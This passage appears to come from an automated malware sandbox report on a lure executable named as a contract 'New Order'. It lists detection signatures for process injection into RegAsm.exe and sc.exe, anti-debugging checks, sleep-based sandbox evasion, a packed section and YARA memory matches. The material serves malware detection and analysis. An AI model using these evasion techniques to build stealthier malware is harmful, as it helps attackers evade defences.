                Source: New Order - RCII900718_Contract Drafting.exe, c8f1bb4de9963b88d3763aa7fcf12cf79.cs.Net Code: c0bc33011b8adf1b13e4a064148b8dee1 System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040184C push E711456Eh; retf 1_2_00401809
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416063 push esi; retf 1_2_0041606E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004021E1 push ss; retf 1_2_004021E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414992 push ebp; iretd 1_2_004149B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417A42 push ss; iretd 1_2_00417A4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004073CC push ds; iretd 1_2_00407424
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004073D3 push ds; iretd 1_2_00407424
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004163A6 push 0000005Ch; iretd 1_2_004163B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00403440 push eax; ret 1_2_00403442
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00418451 pushad ; iretd 1_2_00418474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00411E78 push esp; ret 1_2_00411E79
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00408601 push ds; retf 1_2_00408602
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040AE01 push cs; ret 1_2_0040AE02
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040A763 push 689E092Ah; ret 1_2_0040A775
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0282225F pushad ; ret 1_2_028227F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028227FA pushad ; ret 1_2_028227F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0282283D push eax; iretd 1_2_02822858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028509AD push ecx; mov dword ptr [esp], ecx1_2_028509B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02821368 push eax; iretd 1_2_02821369
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028CBA04 push esi; retf 5_2_028CBA0F
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028CD3E3 push ss; iretd 5_2_028CD3ED
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C7819 push esp; ret 5_2_028C781A
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028BDFA2 push ds; retf 5_2_028BDFA3
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C07A2 push cs; ret 5_2_028C07A3
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028CEFE0 push cs; iretd 5_2_028CEFF5
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028CBD47 push 0000005Ch; iretd 5_2_028CBD53
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028BCD6D push ds; iretd 5_2_028BCDC5
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028BCD74 push ds; iretd 5_2_028BCDC5
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0399225F pushad ; ret 6_2_039927F9
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039927FA pushad ; ret 6_2_039927F9
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039C09AD push ecx; mov dword ptr [esp], ecx6_2_039C09B6
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: section name: .text entropy: 7.99304503862032
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 00000000.00000002.1720676508.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: New Order - RCII900718_Contract Drafting.exe PID: 1892, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\sc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMemory allocated: F10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMemory allocated: 48B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0289096E rdtsc 1_2_0289096E
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\sc.exeWindow / User API: threadDelayed 4150Jump to behavior
                Source: C:\Windows\SysWOW64\sc.exeWindow / User API: threadDelayed 5823Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\sc.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe TID: 2916Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sc.exe TID: 2656Thread sleep count: 4150 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sc.exe TID: 2656Thread sleep time: -8300000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sc.exe TID: 2656Thread sleep count: 5823 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sc.exe TID: 2656Thread sleep time: -11646000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F2CA10 FindFirstFileW,FindNextFileW,FindClose,6_2_02F2CA10
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.0000000003AD8000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.000000000397D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %Q8DF/d6IEvcmRxK/iqxe0yLE/4ixU1vcltilIl%IY6Ul%8QemudZZ%7DFxhQyuY1PM74qlv5Esy
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.0000000003BC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: iUYZ%tz+5ovrFRKmMAQ8DF/d6IEvcmRxK/iqxe0yLE/4ixU1vcltilIl%IY6Ul%8QemudZZ%7DFxhQyuY1PM74qlv5EsyT9e5i
                Source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
                Source: ZrTbKDhAWYKJu.exe, 00000007.00000002.2978554766.00000000007CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2536722694.00000248A9E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0289096E rdtsc 1_2_0289096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417DA3 LdrLoadDll,1_2_00417DA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E284 mov eax, dword ptr fs:[00000030h]1_2_0288E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E284 mov eax, dword ptr fs:[00000030h]1_2_0288E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D0283 mov eax, dword ptr fs:[00000030h]1_2_028D0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D0283 mov eax, dword ptr fs:[00000030h]1_2_028D0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D0283 mov eax, dword ptr fs:[00000030h]1_2_028D0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028602A0 mov eax, dword ptr fs:[00000030h]1_2_028602A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028602A0 mov eax, dword ptr fs:[00000030h]1_2_028602A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h]1_2_028E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E62A0 mov ecx, dword ptr fs:[00000030h]1_2_028E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h]1_2_028E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h]1_2_028E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h]1_2_028E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h]1_2_028E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029262D6 mov eax, dword ptr fs:[00000030h]1_2_029262D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h]1_2_0285A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h]1_2_0285A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h]1_2_0285A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h]1_2_0285A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h]1_2_0285A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028602E1 mov eax, dword ptr fs:[00000030h]1_2_028602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028602E1 mov eax, dword ptr fs:[00000030h]1_2_028602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028602E1 mov eax, dword ptr fs:[00000030h]1_2_028602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284823B mov eax, dword ptr fs:[00000030h]1_2_0284823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290A250 mov eax, dword ptr fs:[00000030h]1_2_0290A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290A250 mov eax, dword ptr fs:[00000030h]1_2_0290A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D8243 mov eax, dword ptr fs:[00000030h]1_2_028D8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D8243 mov ecx, dword ptr fs:[00000030h]1_2_028D8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0292625D mov eax, dword ptr fs:[00000030h]1_2_0292625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284A250 mov eax, dword ptr fs:[00000030h]1_2_0284A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856259 mov eax, dword ptr fs:[00000030h]1_2_02856259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02900274 mov eax, dword ptr fs:[00000030h]1_2_02900274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02854260 mov eax, dword ptr fs:[00000030h]1_2_02854260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02854260 mov eax, dword ptr fs:[00000030h]1_2_02854260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02854260 mov eax, dword ptr fs:[00000030h]1_2_02854260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284826B mov eax, dword ptr fs:[00000030h]1_2_0284826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287438F mov eax, dword ptr fs:[00000030h]1_2_0287438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287438F mov eax, dword ptr fs:[00000030h]1_2_0287438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284E388 mov eax, dword ptr fs:[00000030h]1_2_0284E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284E388 mov eax, dword ptr fs:[00000030h]1_2_0284E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284E388 mov eax, dword ptr fs:[00000030h]1_2_0284E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02848397 mov eax, dword ptr fs:[00000030h]1_2_02848397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02848397 mov eax, dword ptr fs:[00000030h]1_2_02848397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02848397 mov eax, dword ptr fs:[00000030h]1_2_02848397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h]1_2_0285A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h]1_2_0285A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h]1_2_0285A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h]1_2_0285A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h]1_2_0285A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h]1_2_0285A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028583C0 mov eax, dword ptr fs:[00000030h]1_2_028583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028583C0 mov eax, dword ptr fs:[00000030h]1_2_028583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028583C0 mov eax, dword ptr fs:[00000030h]1_2_028583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028583C0 mov eax, dword ptr fs:[00000030h]1_2_028583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D63C0 mov eax, dword ptr fs:[00000030h]1_2_028D63C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE3DB mov eax, dword ptr fs:[00000030h]1_2_028FE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE3DB mov eax, dword ptr fs:[00000030h]1_2_028FE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE3DB mov ecx, dword ptr fs:[00000030h]1_2_028FE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE3DB mov eax, dword ptr fs:[00000030h]1_2_028FE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F43D4 mov eax, dword ptr fs:[00000030h]1_2_028F43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F43D4 mov eax, dword ptr fs:[00000030h]1_2_028F43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290C3CD mov eax, dword ptr fs:[00000030h]1_2_0290C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h]1_2_028603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h]1_2_028603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h]1_2_028603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h]1_2_028603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h]1_2_028603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h]1_2_028603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h]1_2_028603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h]1_2_028603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E3F0 mov eax, dword ptr fs:[00000030h]1_2_0286E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E3F0 mov eax, dword ptr fs:[00000030h]1_2_0286E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E3F0 mov eax, dword ptr fs:[00000030h]1_2_0286E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028863FF mov eax, dword ptr fs:[00000030h]1_2_028863FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A30B mov eax, dword ptr fs:[00000030h]1_2_0288A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A30B mov eax, dword ptr fs:[00000030h]1_2_0288A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A30B mov eax, dword ptr fs:[00000030h]1_2_0288A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284C310 mov ecx, dword ptr fs:[00000030h]1_2_0284C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02870310 mov ecx, dword ptr fs:[00000030h]1_2_02870310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02928324 mov eax, dword ptr fs:[00000030h]1_2_02928324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02928324 mov ecx, dword ptr fs:[00000030h]1_2_02928324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02928324 mov eax, dword ptr fs:[00000030h]1_2_02928324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02928324 mov eax, dword ptr fs:[00000030h]1_2_02928324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291A352 mov eax, dword ptr fs:[00000030h]1_2_0291A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
